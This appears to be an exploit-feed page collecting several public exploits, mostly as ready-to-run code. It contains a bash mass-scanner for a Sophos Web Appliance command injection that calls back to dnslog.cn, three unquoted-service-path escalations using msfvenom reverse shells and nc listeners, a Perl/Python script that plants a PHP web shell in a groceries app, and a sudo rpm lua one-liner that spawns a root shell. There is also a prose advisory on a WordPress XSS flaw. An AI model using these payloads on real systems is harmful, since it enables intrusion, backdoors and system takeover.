Latest exploits :: CodePwn

<pre><code>#!/bin/bash # Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection # Exploit Author: Behnam Abasi Vanda # Vendor Homepage: https://www.sophos.com # Version: Sophos Web Appliance older than version 4.3.10.4 # Tested on: Ubuntu # CVE : CVE-2023-1671 # Shodan Dork: title:"Sophos Web Appliance" # Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce # Reference : https://vulncheck.com/blog/cve-2023-1671-analysis TARGET_LIST="$1" # ===================== BOLD="\033[1m" RED="\e[1;31m" GREEN="\e[1;32m" YELLOW="\e[1;33m" BLUE="\e[1;34m" NOR="\e[0m" # ==================== get_new_subdomain() { cat MN.txt | grep 'YES' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo -e " [+] Trying to get Subdomain $NOR" rm -rf cookie.txt sub=`curl -i -c cookie.txt -s -k -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR" fi } check_vuln() { curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)" req=`curl -i -s -k -b cookie.txt -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getrecords.php?t=0'` echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo "YES" > MN.txt echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR" echo "https://$1" >> vulnerable.lst else echo -e " [-] https://$1 Not Vulnerable :| $NOR" echo "NO" > MN.txt fi } echo ' ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ ██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ ██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ ██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ ██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ' if test "$#" -ne 1; then echo " ----------------------------------------------------------------" echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt " echo " ---------------------------------------------------------------" exit fi rm -rf cookie.txt echo "YES" > MN.txt for target in `cat $TARGET_LIST` do get_new_subdomain; echo " [~] Checking $target" check_vuln "$target" done rm -rf MN.txt rm -rf cookie.txt </code></pre>

<pre><code>##################################################################### # # # Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path # # Date: 2023/04/21 # # Exploit Author: msd0pe # # Vendor Homepage: https://oscinventory-ng.org # # Software Link: https://github.com/OCSInventory-NG/WindowsAgent # # My Github: https://github.com/msd0pe-1 # # Fixed in version 2.3.1.0 # # # ##################################################################### OCS Inventory NG Windows Agent: Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto [2] Get informations about the service: > sc qc "OCS Inventory Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OCS Inventory Service TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OCS Inventory Service DEPENDENCIES : RpcSs : EventLog : Winmgmt : Tcpip SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe [4] Upload the revese shell to C:\Program Files (x86)\OCS.exe > put OCS.exe > ls drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 . drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .. drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "OCS Inventory Service" > sc start "OCS Inventory Service" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system </code></pre>

<pre><code>############################################################################ # # # Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path # # Date: 2023/04/23 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.wondershare.com # # My Github: https://github.com/msd0pe-1 # # # ############################################################################ Wondershare Filmora: Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto [2] Get informations about the service: > sc qc "NativePushService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe [4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe > put Wondershare.exe > ls drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 . drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .. drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush -rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "NativePushService" > sc start "NativePushService" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system </code></pre>

<pre><code>########################################################################## # # # Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path # # Date: 2023/04/22 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.arcsoft.com/ # # My Github: https://github.com/msd0pe-1 # # # ########################################################################## Arcsoft PhotoStudio: Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto [2] Get informations about the service: > sc qc "ADExchange" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ADExchange TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ArcSoft Exchange Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe [4] Upload the reverse shell to C:\Program Files (x86)\Common.exe > put Commom.exe > ls drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 . drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .. drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "ADExchange" > sc start "ADExchange" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system </code></pre>

<pre><code>Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention Plugin Slug: wp-simple-firewall Affected Versions: <= 17.0.17 CVE ID: CVE-2023-0992 CVSS Score: 7.2 (High) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N Researcher/s: Ramuel Gall Fully Patched Version: 17.0.18 The Shield Security plugin for WordPress is vulnerable to stored Cross-Site Scripting in versions up to, and including, 17.0.17 via the 'User-Agent' header. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Description: Shield Security <= 17.0.17 - Missing Authorization Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention Plugin Slug: wp-simple-firewall Affected Versions: <= 17.0.17 CVE ID: CVE-2023-0993 CVSS Score: 4.3 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N Researcher/s: Ramuel Gall Fully Patched Version: 17.0.18 The Shield Security plugin for WordPress is vulnerable to Missing Authorization on the 'theme-plugin-file' AJAX action in versions up to, and including, 17.0.17. This allows authenticated attackers to add arbitrary audit log entries indicating that a theme or plugin has been edited, and is also a vector for Cross-Site Scripting via CVE-2023-0992. Vulnerability Analysis The Shield Security plugin includes a number of features, including an audit log that records certain types of suspicious activity, such as plugin and theme installation, modification, post deletion, and other types of activity that might impact the site. While most of these events require authentication or higher privileges in order to trigger, we found that certain events could be triggered by unauthenticated users. In particular, failed attempts to authenticate using application passwords, new user registrations, and spam activity are among the actions recorded for unauthenticated users. The audit log records metadata about the client that performed the logged activity, including the client’s User-Agent, which can be accessed by clicking the “Meta” tag icon on an audit log entry. Unfortunately, the metadata was not escaped when it was output. While most of the metadata collected about a request has a very strict format and can only be spoofed to a limited extent, User-Agent strings are alphanumeric, and we were able to inject a script in an iframe in the User-Agent header that fired when an administrator viewed an event entry: shieldalert-1024x454 While this exploit does technically require user interaction, it can be considered “Passive” user interaction, that is, it does not require tricking the administrator into performing any actions they might not have performed otherwise. Depending on the payload used, an attacker could use the script executing in the administrator’s browser to create a new administrator account under their control. Additionally, this exploit can be automated, and can be exploited by unauthenticated attackers via a variety of vectors, at least one of which is likely to be present in most common site configurations. As such it earns its High severity rating. The second vulnerability was much lower in severity and consisted of a missing authorization check on the ‘edit-theme-plugin-file’ AJAX action, which is used to record edits to plugin or theme files. The primary consequence of this is that an authenticated attacker can spoof an audit log entry indicating that any file belonging to any plugin or theme on the site was edited. While this is primarily a nuisance, since it can be used to create audit log entries it is yet another vector to exploit the aforementioned Cross-Site Scripting vulnerability. Disclosure Timeline March 20, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. We responsibly disclose the plugin to the developer, who responds quickly and releases a patch in version 17.0.18. April 19, 2023 – The firewall rule becomes available to all Wordfence users. Conclusion In today’s post, we detailed a High Severity Cross-Site Scripting vulnerability in Shield Security. We also detailed a lower-severity issue allowing authenticated attackers to spoof audit log entries indicating that plugin and theme files had been edited. These vulnerabilities have been fully patched in version 17.0.18. Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 20, 2023. Sites still using the free version of Wordfence received the same protection on April 19, 2023. If you know a friend or colleague who is using the Shield Security plugin on their site, we highly recommend forwarding this advisory to them as the Cross-Site Scripting vulnerability can allow Unauthenticated attackers to execute malicious JavaScript in an administrator’s browser, which can lead to site takeover. If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. Thanks to Paul Goodchild from Shield Security for patching the issue quickly. </code></pre>

<pre><code># Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE) # Date: 4/23/2023 # Author: Or4nG.M4n # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: windows # # Vuln File : SystemSettings.php < here you can inject php code # if(isset($_POST['content'])){ # foreach($_POST['content'] as $k => $v) # file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want # } # Vuln File : home.php < here you can include and execute you're php code # <h3 class="text-center">Welcome</h3> # <hr> # <div class="welcome-content"> # <?php include("welcome.html") ?> <=== include # </div> # Perl Code use LWP::UserAgent; use LWP::Simple; print "Target Url #"; my $url = <STDIN>; chomp $url; $backdoor = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'; my $ua = LWP::UserAgent->new(); my $response = $ua->post( $url."/classes/SystemSettings.php?f=update_settings", { 'content[welcome]' => $backdoor } ); my $content = $response->decoded_content(); print "[+] injection in welcome page\n"; print "[+] backdoor url ".$url."/?cmd=ls -al"; # Python Code import requests url = input("Enter url :") postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'} resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata) print("[+] injection in welcome page") print("[+]"+url+"/?cmd=ls -al") print("\n") </code></pre>

<pre><code>=============================================================================== title: Incorrect Permission Assignment product: Nokia OneNDS 20.9 vulnerability type: Security Misconfiguration severity: High CVSS Score: 7.8 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H found on: 04/05/2022 by: Giacomo Sighinolfi <giacomosighinolfi@gmail.com> cve: CVE-2022-30759 =============================================================================== Some sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands on the system. The affected users are: Provgw, notifs, dbmrun, (system users) They can run as root the following script: /opt/cntdb/bin/noscripts_rpm.sh It can be exploited with: sudo /opt/cntdb/bin/noscripts_rpm.sh force-erase "--eval '%{lua:os.execute(\"/bin/sh\")}'" =============================================================================== Detailed analysis: The script accept as first argument one of the these options: install|update|fallback|erase|test-install|test-update|test-erase| force-install|force-update|force-erase and as a second argument an arbitrary rpm package name. If we analyze the switch case code block (row 175) we can see how the first argument influence the execution of the script. 175. case "$1" in … 224. test-erase) 225. TEST_OPTION="--test" 226. OPTION="-e" 227. ;; … 238. force-erase) 239. TEST_OPTION="--nodeps" 240. OPTION="-e" 241. ;; … Using “force-erase” or “test-erase” as the first argument, it creates “OPTION” variable with “-e” as its value. That value allow us to trigger a privilege escalation exploiting the rpm command (row 254) with a particular rpm package name as second parameter passed to the script. … 252. if [ $OPTION == "-e" ] 253. then 254. rpm $OPTION --noscripts $TEST_OPTION $2 … =============================================================================== </code></pre>